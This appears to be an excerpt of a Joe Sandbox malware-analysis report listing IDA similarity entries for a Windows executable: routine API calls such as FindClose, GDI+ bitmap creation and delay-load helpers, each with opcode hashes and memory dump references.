                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: c09c96fc0c733d8c62ce324b094605b93f1343df84a25d37f2b93ee6b9b87aa0
                                                                                          • Instruction ID: b05a930544069666b17959bc316c34da38b266125b77168899f5e0d93700c443
                                                                                          • Opcode Fuzzy Hash: c09c96fc0c733d8c62ce324b094605b93f1343df84a25d37f2b93ee6b9b87aa0
                                                                                          • Instruction Fuzzy Hash: 70E06531501E745AEF333B659C46B5A36C8FF513A9F1D0324BC16D6190DB31CC0147A9
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00875B3A
                                                                                            • Part of subcall function 0087AC66: __EH_prolog.LIBCMT ref: 0087AC6B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: 209f53b682f64e29ae5a19615e31b0acf66045fc0681599cec4bac1c48b782b3
                                                                                          • Instruction ID: b46127160b6b594f7462c24d1e4acc81d83302d3d4aa8920d1b11d65f5359ac0
                                                                                          • Opcode Fuzzy Hash: 209f53b682f64e29ae5a19615e31b0acf66045fc0681599cec4bac1c48b782b3
                                                                                          • Instruction Fuzzy Hash: FC018B30900684DACB06E7A8C0153EDBBE4EF56304F40C0ADA95D93282CBB46B08A763
                                                                                          APIs
                                                                                          • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0087A174
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseFind
                                                                                          • String ID:
                                                                                          • API String ID: 1863332320-0
                                                                                          • Opcode ID: cfa833ce9ecfabbda8357ba62ce96d90b5dba3a59f598c3d0cc81cf178d9edd4
                                                                                          • Instruction ID: 10bf4c8d6540b2c2d13ec057144660eab9cf8a371a2570416ef9fc14b2917035
                                                                                          • Opcode Fuzzy Hash: cfa833ce9ecfabbda8357ba62ce96d90b5dba3a59f598c3d0cc81cf178d9edd4
                                                                                          • Instruction Fuzzy Hash: 4DF0B431408780EADA229BB88404BCB7B95BF46331F04CA49F1FE82196C27590859733
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00871E93
                                                                                            • Part of subcall function 008718F6: __EH_prolog.LIBCMT ref: 008718FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: bbbb5c938c144e52c708cb0746c022d239834102951e288c90881c55e7683ca3
                                                                                          • Instruction ID: 67cfa418f0f22420e7c7861a791cbbbd8e8e68c5039884c65cd5406c278a0c34
                                                                                          • Opcode Fuzzy Hash: bbbb5c938c144e52c708cb0746c022d239834102951e288c90881c55e7683ca3
                                                                                          • Instruction Fuzzy Hash: 2BF0D4B1D102898ECF40EFAC84096EEBBB4FB18300F0441BAD509E7602E73486048BA2
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00871E93
                                                                                            • Part of subcall function 008718F6: __EH_prolog.LIBCMT ref: 008718FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                          • Instruction ID: 0525880fc22c7767646180ccbff0b54629550b41149092dcf17bf8fd980b6156
                                                                                          • Opcode Fuzzy Hash: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                          • Instruction Fuzzy Hash: F8F098B1C112598ECF41EFACC4496EEBBF5FB18300F1441BAD409E7606E7359604CB91
                                                                                          APIs
                                                                                          • SetThreadExecutionState.KERNEL32(00000001), ref: 0087F927
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExecutionStateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2211380416-0
                                                                                          • Opcode ID: 406cdf9079d4a0d7202508cc66e8b9e9c5394cd84cf126b65700ae27d2560679
                                                                                          • Instruction ID: e8327f303e0b1a269232d87eb2df3cb0ba65fd1d014bed6e5331bd36d596ce36
                                                                                          • Opcode Fuzzy Hash: 406cdf9079d4a0d7202508cc66e8b9e9c5394cd84cf126b65700ae27d2560679
                                                                                          • Instruction Fuzzy Hash: 03D0C25030461026E621332C6806BBD2907FFCB360F084035B208D26D7AA46886AA6F3
                                                                                          APIs
                                                                                          • GdipAlloc.GDIPLUS(00000010), ref: 00888B6B
                                                                                            • Part of subcall function 00888924: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00888945
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                          • String ID:
                                                                                          • API String ID: 1915507550-0
                                                                                          • Opcode ID: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                          • Instruction ID: cc689320b8d4c923c009300e08fd902f1db6c225bf4998a7854ecf6160313ade
                                                                                          • Opcode Fuzzy Hash: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                          • Instruction Fuzzy Hash: 25D0A77060010CFBDF607E648C0297DBAD8FB413A0F808135BC04D6150EE72DD106362
                                                                                          APIs
                                                                                          • GetFileType.KERNELBASE(000000FF,0087964C), ref: 00879726
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileType
                                                                                          • String ID:
                                                                                          • API String ID: 3081899298-0
                                                                                          • Opcode ID: e467b47e7cc866369be8825c27bfadd5386ff6ff54155d9ef1b156a1838d5e15
                                                                                          • Instruction ID: f457fc9f432bbedc32976c2d3cc1495e3bd76902f4bb49cea4bf035bf6327528
                                                                                          • Opcode Fuzzy Hash: e467b47e7cc866369be8825c27bfadd5386ff6ff54155d9ef1b156a1838d5e15
                                                                                          • Instruction Fuzzy Hash: 69D01230031640958E690E385D090666661FB433E6B28DAE4E0ADC40A9C722C843F541
                                                                                          APIs
                                                                                          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0088BF9C
                                                                                            • Part of subcall function 0088991E: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088992F
                                                                                            • Part of subcall function 0088991E: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00889940
                                                                                            • Part of subcall function 0088991E: TranslateMessage.USER32(?), ref: 0088994A
                                                                                            • Part of subcall function 0088991E: DispatchMessageW.USER32(?), ref: 00889954
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$DispatchItemPeekSendTranslate
                                                                                          • String ID:
                                                                                          • API String ID: 4142818094-0
                                                                                          • Opcode ID: 1d49b1955a991cca5a1493271c4d238134880183a1eebc14c8b4497b589c0dc8
                                                                                          • Instruction ID: f383032066081704e41c63885fbfb8c1c97dbfca6b4c1ca0a2ba8a8a07c910c7
                                                                                          • Opcode Fuzzy Hash: 1d49b1955a991cca5a1493271c4d238134880183a1eebc14c8b4497b589c0dc8
                                                                                          • Instruction Fuzzy Hash: 50D09E32144200EAD6112B55CD06F1A7AA2FB8CB04F004958B284740B186629D31EB12
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0088C799
                                                                                            • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                                                            • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 66ae487b981a2bf42bb058f437c009e3e1b940872bb45a3ce1d0c41dc5c46a71
                                                                                          • Instruction ID: 3e1ee50201fae8dee9527a6f8d32069f23008f9b1741bf7bdfb7789625022e4c
                                                                                          • Opcode Fuzzy Hash: 66ae487b981a2bf42bb058f437c009e3e1b940872bb45a3ce1d0c41dc5c46a71
                                                                                          • Instruction Fuzzy Hash: C6B012D1258106BD318CB1481C42C37010DF0C3B24330C41FF801C0A48EAD40C5D8133
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0088C799
                                                                                            • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                                                            • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 4b2ca973a70a0871031e9dffbc71a363313b976c4e2038d11c6dbc87bc387cdc
                                                                                          • Instruction ID: b679c0796fd6fd34804bed0eeb1e0cbf164a61654cc144671b772bfd66e7920b
                                                                                          • Opcode Fuzzy Hash: 4b2ca973a70a0871031e9dffbc71a363313b976c4e2038d11c6dbc87bc387cdc
                                                                                          • Instruction Fuzzy Hash: 05B012D1258109AD31CCF14D1C02D37010CF0C2B24330C41FF400C0B48E9E40C598337
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0088C799
                                                                                            • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                                                            • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 5bce15c15dd23fabbd9d2a3fc6a15f624b0be259d2b6a96d797affcc50beef8b
                                                                                          • Instruction ID: f9dc595a1caaf7252dce3fd6dec8321e4d57c9cb096f983195a2632ebd2e3687
                                                                                          • Opcode Fuzzy Hash: 5bce15c15dd23fabbd9d2a3fc6a15f624b0be259d2b6a96d797affcc50beef8b
                                                                                          • Instruction Fuzzy Hash: 29B012D129C006AD318CF14C5D02D37010DF0C2B24330C41FF401C1B48E9D90C5E8233
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                                                            • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                                                            • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 0a2d1fd84a1f7c6765b76e5d937451de3970e1aaa5307120e44c5e6bff3d2d3e
                                                                                          • Instruction ID: 9ebd377f6b82cbf5f18bd63e572e9cc9fe22f0e905d3458b1982c86dbecc80ce
                                                                                          • Opcode Fuzzy Hash: 0a2d1fd84a1f7c6765b76e5d937451de3970e1aaa5307120e44c5e6bff3d2d3e
                                                                                          • Instruction Fuzzy Hash: 39B012E1268226BC350CB1D82D42D37050CF0C2B24330851FF400D4944EAA42C44CB33
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                                                            • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                                                            • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: a540938f360854be2c62944c25788a4b2d3ba259e141603d0c97d9987bb3a06c
                                                                                          • Instruction ID: d622cf05cd0750b5afc94d09e92fa449aca0597803bfa2c784cacfba6941f40d
                                                                                          • Opcode Fuzzy Hash: a540938f360854be2c62944c25788a4b2d3ba259e141603d0c97d9987bb3a06c
                                                                                          • Instruction Fuzzy Hash: A3B012D1278116AC324CF19C2D02D37054CF0C2B14330C41FF800C0A44E9941C048B33
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                                                            • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                                                            • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 9933d15a70a45e73c601d8b437d6e280403ff547e60a0124d387388a912149af
                                                                                          • Instruction ID: 398f5a82b641eb81ba9446629a464d0be023ac120429689315cfe4c83eea8e72
                                                                                          • Opcode Fuzzy Hash: 9933d15a70a45e73c601d8b437d6e280403ff547e60a0124d387388a912149af
                                                                                          • Instruction Fuzzy Hash: 39B012D1378016AC318CF19CAD02E37054CF0C2B14330851FF401C0A44E9941C048733
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                                                            • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                                                            • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 7e7e3cf28bdba3bd67bc93f233d84f8591db2823773fe9cbfbdf75a4497bfc06
                                                                                          • Instruction ID: 661b00c467403a5c9d429b8a6fb0d98bf4afd69e4afe6819a472290e860935fd
                                                                                          • Opcode Fuzzy Hash: 7e7e3cf28bdba3bd67bc93f233d84f8591db2823773fe9cbfbdf75a4497bfc06
                                                                                          • Instruction Fuzzy Hash: CDB012D1268216AD314CF19C7F02D37054CF0C2B14330841FF400C0A44F9981C058B33
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                                                            • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                                                            • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 647b27e0694985c668f9435ef45d5e45e9e4005c05e526f217d8d8697d370c17
                                                                                          • Instruction ID: 436b7988e164a7ec813bcd55de263cc2a5b515a7e2646b94d6b765e64bec88bc
                                                                                          • Opcode Fuzzy Hash: 647b27e0694985c668f9435ef45d5e45e9e4005c05e526f217d8d8697d370c17
                                                                                          • Instruction Fuzzy Hash: 10A011E22A800BBC3008B2A82C02C3B0A0CF0C2B28330880EF802C0288A8A808000A32
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0088C799
                                                                                            • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                                                            • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
